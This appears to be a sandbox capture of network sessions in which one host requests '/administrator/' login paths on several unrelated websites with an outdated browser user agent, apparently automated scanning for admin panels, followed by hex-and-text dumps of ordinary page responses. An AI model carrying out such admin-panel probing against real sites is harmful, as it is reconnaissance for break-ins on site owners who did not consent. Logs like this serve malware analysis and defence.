data-cfasync="false" type="text/javascript" src="js/dist/n
2024-02-20 23:26:11 UTC	1369	IN	Data Raw: 63 6f 64 65 6d 69 72 72 6f 72 2f 61 64 64 6f 6e 2f 6c 69 6e 74 2f 73 71 6c 2d 6c 69 6e 74 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 76 65 6e 64 6f 72 2f 74 72 61 63 65 6b 69 74 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 64 69 73 74 2f 65 72 72 6f 72 5f 72 65 70 6f 72 74 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a Data Ascii: codemirror/addon/lint/sql-lint.js?v=5.2.1"></script> <script data-cfasync="false" type="text/javascript" src="js/vendor/tracekit.js?v=5.2.1"></script> <script data-cfasync="false" type="text/javascript" src="js/dist/error_report.js?v=5.2.1"></script>
2024-02-20 23:26:11 UTC	1369	IN	Data Raw: 64 61 74 65 70 69 63 6b 65 72 2e 72 65 67 69 6f 6e 61 6c 5b 27 27 5d 2e 70 72 65 76 54 65 78 74 20 3d 20 27 50 72 65 76 27 3b 0a 20 20 24 2e 64 61 74 65 70 69 63 6b 65 72 2e 72 65 67 69 6f 6e 61 6c 5b 27 27 5d 2e 6e 65 78 74 54 65 78 74 20 3d 20 27 4e 65 78 74 27 3b 0a 20 20 24 2e 64 61 74 65 70 69 63 6b 65 72 2e 72 65 67 69 6f 6e 61 6c 5b 27 27 5d 2e 63 75 72 72 65 6e 74 54 65 78 74 20 3d 20 27 54 6f 64 61 79 27 3b 0a 20 20 24 2e 64 61 74 65 70 69 63 6b 65 72 2e 72 65 67 69 6f 6e 61 6c 5b 27 27 5d 2e 6d 6f 6e 74 68 4e 61 6d 65 73 20 3d 20 5b 0a 20 20 20 20 27 4a 61 6e 75 61 72 79 27 2c 0a 20 20 20 20 27 46 65 62 72 75 61 72 79 27 2c 0a 20 20 20 20 27 4d 61 72 63 68 27 2c 0a 20 20 20 20 27 41 70 72 69 6c 27 2c 0a 20 20 20 20 27 4d 61 79 27 2c 0a 20 20 20 Data Ascii: datepicker.regional[''].prevText = 'Prev'; $.datepicker.regional[''].nextText = 'Next'; $.datepicker.regional[''].currentText = 'Today'; $.datepicker.regional[''].monthNames = [ 'January', 'February', 'March', 'April', 'May',
2024-02-20 23:26:11 UTC	1369	IN	Data Raw: 64 27 3b 0a 20 20 24 2e 65 78 74 65 6e 64 28 24 2e 74 69 6d 65 70 69 63 6b 65 72 2e 5f 64 65 66 61 75 6c 74 73 2c 20 24 2e 74 69 6d 65 70 69 63 6b 65 72 2e 72 65 67 69 6f 6e 61 6c 5b 27 27 5d 29 3b 0a 7d 0a 0a 66 75 6e 63 74 69 6f 6e 20 65 78 74 65 6e 64 69 6e 67 56 61 6c 69 64 61 74 6f 72 4d 65 73 73 61 67 65 73 20 28 29 20 7b 0a 20 20 24 2e 65 78 74 65 6e 64 28 24 2e 76 61 6c 69 64 61 74 6f 72 2e 6d 65 73 73 61 67 65 73 2c 20 7b 0a 20 20 20 20 72 65 71 75 69 72 65 64 3a 20 27 54 68 69 73 5c 75 30 30 32 30 66 69 65 6c 64 5c 75 30 30 32 30 69 73 5c 75 30 30 32 30 72 65 71 75 69 72 65 64 27 2c 0a 20 20 20 20 72 65 6d 6f 74 65 3a 20 27 50 6c 65 61 73 65 5c 75 30 30 32 30 66 69 78 5c 75 30 30 32 30 74 68 69 73 5c 75 30 30 32 30 66 69 65 6c 64 27 2c 0a 20 20 Data Ascii: d'; $.extend($.timepicker._defaults, $.timepicker.regional['']);}function extendingValidatorMessages () { $.extend($.validator.messages, { required: 'This\u0020field\u0020is\u0020required', remote: 'Please\u0020fix\u0020this\u0020field',
2024-02-20 23:26:11 UTC	1369	IN	Data Raw: 27 50 6c 65 61 73 65 5c 75 30 30 32 30 65 6e 74 65 72 5c 75 30 30 32 30 61 5c 75 30 30 32 30 76 61 6c 75 65 5c 75 30 30 32 30 6c 65 73 73 5c 75 30 30 32 30 74 68 61 6e 5c 75 30 30 32 30 6f 72 5c 75 30 30 32 30 65 71 75 61 6c 5c 75 30 30 32 30 74 6f 5c 75 30 30 32 30 5c 75 30 30 37 42 30 5c 75 30 30 37 44 27 29 2c 0a 20 20 20 20 6d 69 6e 3a 20 24 2e 76 61 6c 69 64 61 74 6f 72 2e 66 6f 72 6d 61 74 28 27 50 6c 65 61 73 65 5c 75 30 30 32 30 65 6e 74 65 72 5c 75 30 30 32 30 61 5c 75 30 30 32 30 76 61 6c 75 65 5c 75 30 30 32 30 67 72 65 61 74 65 72 5c 75 30 30 32 30 74 68 61 6e 5c 75 30 30 32 30 6f 72 5c 75 30 30 32 30 65 71 75 61 6c 5c 75 30 30 32 30 74 6f 5c 75 30 30 32 30 5c 75 30 30 37 42 30 5c 75 30 30 37 44 27 29 2c 0a 20 20 20 20 76 61 6c 69 64 61 74 69 Data Ascii: 'Please\u0020enter\u0020a\u0020value\u0020less\u0020than\u0020or\u0020equal\u0020to\u0020\u007B0\u007D'), min: $.validator.format('Please\u0020enter\u0020a\u0020value\u0020greater\u0020than\u0020or\u0020equal\u0020to\u0020\u007B0\u007D'), validati
2024-02-20 23:26:11 UTC	1369	IN	Data Raw: 6e 2e 6a 73 27 2c 20 30 29 0a 20 20 2e 61 64 64 28 27 76 65 6e 64 6f 72 2f 6a 71 75 65 72 79 2f 6a 71 75 65 72 79 2d 75 69 2d 74 69 6d 65 70 69 63 6b 65 72 2d 61 64 64 6f 6e 2e 6a 73 27 2c 20 30 29 0a 20 20 2e 61 64 64 28 27 76 65 6e 64 6f 72 2f 6a 71 75 65 72 79 2f 6a 71 75 65 72 79 2e 64 65 62 6f 75 6e 63 65 2d 31 2e 30 2e 36 2e 6a 73 27 2c 20 30 29 0a 20 20 2e 61 64 64 28 27 6d 65 6e 75 5f 72 65 73 69 7a 65 72 2e 6a 73 27 2c 20 31 29 0a 20 20 2e 61 64 64 28 27 63 72 6f 73 73 5f 66 72 61 6d 69 6e 67 5f 70 72 6f 74 65 63 74 69 6f 6e 2e 6a 73 27 2c 20 30 29 0a 20 20 2e 61 64 64 28 27 6d 65 73 73 61 67 65 73 2e 70 68 70 27 2c 20 30 29 0a 20 20 2e 61 64 64 28 27 63 6f 6e 66 69 67 2e 6a 73 27 2c 20 31 29 0a 20 20 2e 61 64 64 28 27 64 6f 63 6c 69 6e 6b 73 2e Data Ascii: n.js', 0) .add('vendor/jquery/jquery-ui-timepicker-addon.js', 0) .add('vendor/jquery/jquery.debounce-1.0.6.js', 0) .add('menu_resizer.js', 1) .add('cross_framing_protection.js', 0) .add('messages.php', 0) .add('config.js', 1) .add('doclinks.

Session ID	Source IP	Source Port	Destination IP	Destination Port
113	192.168.2.6	59068	3.33.130.190	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:10 UTC	398	OUT	GET /administrator/index.php HTTP/1.1 Host: blauthlaw.com Accept: / Accept-Encoding: deflate, gzip Cookie: traffic_target=gd; lander_type=parkweb; caf_ipaddr=191.96.227.222; _policy={"restricted_market":false,"tracking_market":"none"}; country=US; city="Phoenix" User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://blauthlaw.com/administrator/
2024-02-20 23:26:11 UTC	879	IN	HTTP/1.1 200 OK Server: openresty Date: Tue, 20 Feb 2024 23:26:11 GMT Content-Type: text/html Content-Length: 524 Last-Modified: Mon, 29 Jan 2024 23:29:16 GMT Connection: close ETag: "65b834cc-20c" X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_Dock9KQjgjs0OzgJTT0pAC7LKsCOzHF/+kKDlrhA3RajaXLC0+z3O1vibgRAjtSDJpiZjFVb+9MPQEUdBmqMPw Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=191.96.227.222;Path=/;Max-Age=86400; Set-Cookie: country=US;Path=/;Max-Age=86400; Set-Cookie: city="Phoenix";Path=/;Max-Age=86400; Set-Cookie: lander_type=parkweb;Path=/;Max-Age=86400; Set-Cookie: traffic_target=gd;Path=/;Max-Age=86400; Set-Cookie: _policy={"restricted_market":false,"tracking_market":"none"};Path=/;Max-Age=86400; Accept-Ranges: bytes
2024-02-20 23:26:11 UTC	524	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 2f 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 64 73 65 6e 73 65 2f 64 6f 6d 61 69 6e 73 2f 63 61 66 2e 6a 73 3f 61 62 70 3d 31 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 4c 41 4e 44 45 Data Ascii: <!doctype html><html lang="en"><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="icon" href="data:,"/><script src="https://www.google.com/adsense/domains/caf.js?abp=1"></script><script>window.LANDE

Session ID	Source IP	Source Port	Destination IP	Destination Port
114	192.168.2.6	58723	13.232.255.130	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:11 UTC	183	OUT	GET /administrator/ HTTP/1.1 Host: amsantechnology.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:11 UTC	331	IN	HTTP/1.1 404 Not Found Date: Tue, 20 Feb 2024 23:26:11 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://amsantechnology.com/wp-json/>; rel="https://api.w.org/" Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2024-02-20 23:26:11 UTC	7861	IN	Data Raw: 32 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 20 0d 0a 09 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 Data Ascii: 2000<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="https://gmpg.org/xfn/11"> <meta name='robots' content='noindex, follow' />
2024-02-20 23:26:11 UTC	337	IN	Data Raw: 2d 61 73 74 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 33 29 3b 7d 2e 65 6e 74 72 79 2d 6d 65 74 61 20 61 3a 68 6f 76 65 72 2c 2e 65 6e 74 72 79 2d 6d 65 74 61 20 61 3a 68 6f 76 65 72 20 2a 2c 2e 65 6e 74 72 79 2d 6d 65 74 61 20 61 3a 66 6f 63 75 73 2c 2e 65 6e 74 72 79 2d 6d 65 74 61 20 61 3a 66 6f 63 75 73 20 2a 2c 2e 70 61 67 65 2d 6c 69 6e 6b 73 20 3e 20 2e 70 61 67 65 2d 6c 69 6e 6b 2c 2e 70 61 67 65 2d 6c 69 6e 6b 73 20 2e 70 61 67 65 2d 6c 69 6e 6b 3a 68 6f 76 65 72 2c 2e 70 6f 73 74 2d 6e 61 76 69 67 61 74 69 6f 6e 20 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 61 73 74 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 31 29 3b 7d 23 63 61 74 20 6f 70 74 69 6f 6e 2c 2e 73 65 63 6f 6e 64 61 72 79 20 2e 63 61 6c 65 6e 64 61 72 5f 77 72 61 70 Data Ascii: -ast-global-color-3);}.entry-meta a:hover,.entry-meta a:hover ,.entry-meta a:focus,.entry-meta a:focus ,.page-links > .page-link,.page-links .page-link:hover,.post-navigation a:hover{color:var(--ast-global-color-1);}#cat option,.secondary .calendar_wrap
2024-02-20 23:26:11 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2024-02-20 23:26:12 UTC	8192	IN	Data Raw: 32 30 30 30 0d 0a 3b 7d 2e 73 65 63 6f 6e 64 61 72 79 20 2e 63 61 6c 65 6e 64 61 72 5f 77 72 61 70 20 23 74 6f 64 61 79 2c 2e 61 73 74 2d 70 72 6f 67 72 65 73 73 2d 76 61 6c 20 73 70 61 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 76 61 72 28 2d 2d 61 73 74 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 33 29 3b 7d 2e 73 65 63 6f 6e 64 61 72 79 20 61 3a 68 6f 76 65 72 20 2b 20 2e 70 6f 73 74 2d 63 6f 75 6e 74 2c 2e 73 65 63 6f 6e 64 61 72 79 20 61 3a 66 6f 63 75 73 20 2b 20 2e 70 6f 73 74 2d 63 6f 75 6e 74 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 76 61 72 28 2d 2d 61 73 74 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 33 29 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 61 73 74 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 33 29 3b 7d 2e 63 61 6c 65 6e 64 61 72 5f Data Ascii: 2000;}.secondary .calendar_wrap #today,.ast-progress-val span{background:var(--ast-global-color-3);}.secondary a:hover + .post-count,.secondary a:focus + .post-count{background:var(--ast-global-color-3);border-color:var(--ast-global-color-3);}.calendar_
2024-02-20 23:26:12 UTC	6	IN	Data Raw: 2e 77 6f 6f 63 6f Data Ascii: .wooco
2024-02-20 23:26:12 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2024-02-20 23:26:12 UTC	8192	IN	Data Raw: 32 30 30 30 0d 0a 6d 6d 65 72 63 65 20 69 6e 70 75 74 2e 62 75 74 74 6f 6e 2e 61 6c 74 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 69 6e 70 75 74 2e 62 75 74 74 6f 6e 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 69 6e 70 75 74 2e 62 75 74 74 6f 6e 3a 64 69 73 61 62 6c 65 64 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 69 6e 70 75 74 2e 62 75 74 74 6f 6e 3a 64 69 73 61 62 6c 65 64 5b 64 69 73 61 62 6c 65 64 5d 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 69 6e 70 75 74 2e 62 75 74 74 6f 6e 3a 64 69 73 61 62 6c 65 64 3a 68 6f 76 65 72 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 69 6e 70 75 74 2e 62 75 74 74 6f 6e 3a 64 69 73 61 62 6c 65 64 5b 64 69 73 61 62 6c 65 64 5d 3a 68 6f 76 65 72 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 23 72 65 73 70 6f 6e 64 20 69 6e 70 75 74 Data Ascii: 2000mmerce input.button.alt,.woocommerce input.button,.woocommerce input.button:disabled,.woocommerce input.button:disabled[disabled],.woocommerce input.button:disabled:hover,.woocommerce input.button:disabled[disabled]:hover,.woocommerce #respond input
2024-02-20 23:26:12 UTC	6	IN	Data Raw: 74 2d 73 69 7a 65 Data Ascii: t-size
2024-02-20 23:26:12 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2024-02-20 23:26:12 UTC	8192	IN	Data Raw: 32 30 30 30 0d 0a 3a 31 38 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 32 35 72 65 6d 3b 7d 68 35 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 35 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 39 33 37 35 72 65 6d 3b 7d 68 36 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 36 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 31 32 35 72 65 6d 3b 7d 68 65 61 64 65 72 20 2e 63 75 73 74 6f 6d 2d 6c 6f 67 6f 2d 6c 69 6e 6b 20 69 6d 67 2c 2e 61 73 74 2d 68 65 61 64 65 72 2d 62 72 65 61 6b 2d 70 6f 69 6e 74 20 2e 73 69 74 65 2d 62 72 61 6e 64 69 6e 67 20 69 6d 67 2c 2e 61 73 74 2d 68 65 61 64 65 72 2d 62 72 65 61 6b 2d 70 6f 69 6e 74 20 2e 63 75 73 74 6f 6d 2d 6c 6f 67 6f 2d Data Ascii: 2000:18px;font-size:1.125rem;}h5,.entry-content h5{font-size:15px;font-size:0.9375rem;}h6,.entry-content h6{font-size:13px;font-size:0.8125rem;}header .custom-logo-link img,.ast-header-break-point .site-branding img,.ast-header-break-point .custom-logo-

Session ID	Source IP	Source Port	Destination IP	Destination Port
115	192.168.2.6	59467	104.21.54.169	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:11 UTC	244	OUT	GET /administrator/ HTTP/1.1 Host: fortressrealcapital.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://fortressrealcapital.com/administrator/
2024-02-20 23:26:11 UTC	795	IN	HTTP/1.1 404 Not Found Date: Tue, 20 Feb 2024 23:26:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close vary: Accept-Encoding expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 link: <https://fortressrealcapital.com/wp-json/>; rel="https://api.w.org/" CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=lf%2FJpKYBl0sHce8gCN7tqQOGtAgnNZCv7%2Bbi7ef9OiJRwfSWdbLKCuGVtr3v2xjH4vsE8Ay7wWeQlg%2Fol1s9fTJ%2FC7%2Fe%2F9dNm%2Br2A6KiSRCvcSo6ubH8xHO1SLbz8qcdxdGc74T8e03SHg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 858a8358dd1cc436-EWR alt-svc: h3=":443"; ma=86400
2024-02-20 23:26:11 UTC	574	IN	Data Raw: 37 63 39 37 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c Data Ascii: 7c97<!doctype html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><meta name='robots' content='noindex, follow' /><
2024-02-20 23:26:11 UTC	1369	IN	Data Raw: 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 46 6f 72 74 72 65 73 73 20 52 65 61 6c 20 43 61 70 69 74 61 6c 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 64 2b 6a 73 6f 6e 22 20 63 6c 61 73 73 3d 22 79 6f 61 73 74 2d 73 63 68 65 6d 61 2d 67 72 61 70 68 22 3e 7b 22 40 63 6f 6e 74 65 78 74 22 3a 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 22 2c 22 40 67 72 61 70 68 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 57 65 62 53 69 74 65 22 2c 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 66 6f 72 74 72 65 73 73 72 65 61 6c 63 61 70 69 74 61 6c 2e 63 6f 6d 2f 23 77 65 62 73 69 74 65 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 66 6f 72 74 72 65 73 73 72 65 61 6c 63 61 70 69 74 61 6c 2e Data Ascii: site_name" content="Fortress Real Capital" /><script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"https://fortressrealcapital.com/#website","url":"https://fortressrealcapital.
2024-02-20 23:26:11 UTC	1369	IN	Data Raw: 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 46 6f 72 74 72 65 73 73 20 52 65 61 6c 20 43 61 70 69 74 61 6c 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 72 74 72 65 73 73 72 65 61 6c 63 61 70 69 74 61 6c 2e 63 6f 6d 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 2f 2a 20 3c 21 5b 43 44 41 54 41 5b 20 2a 2f 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 Data Ascii: ' /><link rel="alternate" type="application/rss+xml" title="Fortress Real Capital » Feed" href="https://fortressrealcapital.com/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/image
2024-02-20 23:26:11 UTC	1369	IN	Data Raw: 34 30 5c 75 64 63 36 32 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 35 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 65 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 37 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 37 66 22 29 3b 63 61 73 65 22 65 6d 6f 6a 69 22 3a 72 65 74 75 72 6e 21 6e 28 65 2c 22 5c 75 64 38 33 65 5c 75 64 65 66 31 5c 75 64 38 33 63 5c 75 64 66 66 62 5c 75 32 30 30 64 5c 75 64 38 33 65 5c 75 64 65 66 32 5c 75 64 38 33 63 5c 75 64 66 66 66 22 2c 22 5c 75 64 38 33 65 5c 75 64 65 66 31 5c 75 64 38 33 63 5c 75 64 66 66 62 5c 75 32 30 30 62 5c 75 64 38 33 65 5c 75 64 65 66 32 5c 75 64 38 33 63 5c 75 64 66 66 66 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 3d 22 Data Ascii: 40\udc62\u200b\udb40\udc65\u200b\udb40\udc6e\u200b\udb40\udc67\u200b\udb40\udc7f");case"emoji":return!n(e,"\ud83e\udef1\ud83c\udffb\u200d\ud83e\udef2\ud83c\udfff","\ud83e\udef1\ud83c\udffb\u200b\ud83e\udef2\ud83c\udfff")}return!1}function f(e,t,n){var r="
2024-02-20 23:26:11 UTC	1369	IN	Data Raw: 22 7d 29 2c 61 3d 6e 65 77 20 57 6f 72 6b 65 72 28 55 52 4c 2e 63 72 65 61 74 65 4f 62 6a 65 63 74 55 52 4c 28 72 29 2c 7b 6e 61 6d 65 3a 22 77 70 54 65 73 74 45 6d 6f 6a 69 53 75 70 70 6f 72 74 73 22 7d 29 3b 72 65 74 75 72 6e 20 76 6f 69 64 28 61 2e 6f 6e 6d 65 73 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 20 69 6e 20 65 29 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 Data Ascii: "}),a=new Worker(URL.createObjectURL(r),{name:"wpTestEmojiSupports"});return void(a.onmessage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.e
2024-02-20 23:26:11 UTC	1369	IN	Data Raw: 0a 2e 77 70 2d 62 6c 6f 63 6b 2d 61 75 64 69 6f 20 66 69 67 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 68 65 6d 65 20 2e 77 70 2d 62 6c 6f 63 6b 2d 61 75 64 69 6f 20 66 69 67 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 68 73 6c 61 28 30 2c 30 25 2c 31 30 30 25 2c 2e 36 35 29 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 61 75 64 69 6f 7b 6d 61 72 67 69 6e 3a 30 20 30 20 31 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 64 65 7b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 63 63 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 34 70 78 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 4d 65 6e 6c 6f 2c 43 6f 6e 73 6f 6c 61 73 2c 6d 6f Data Ascii: .wp-block-audio figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-audio figcaption{color:hsla(0,0%,100%,.65)}.wp-block-audio{margin:0 0 1em}.wp-block-code{border:1px solid #ccc;border-radius:4px;font-family:Menlo,Consolas,mo
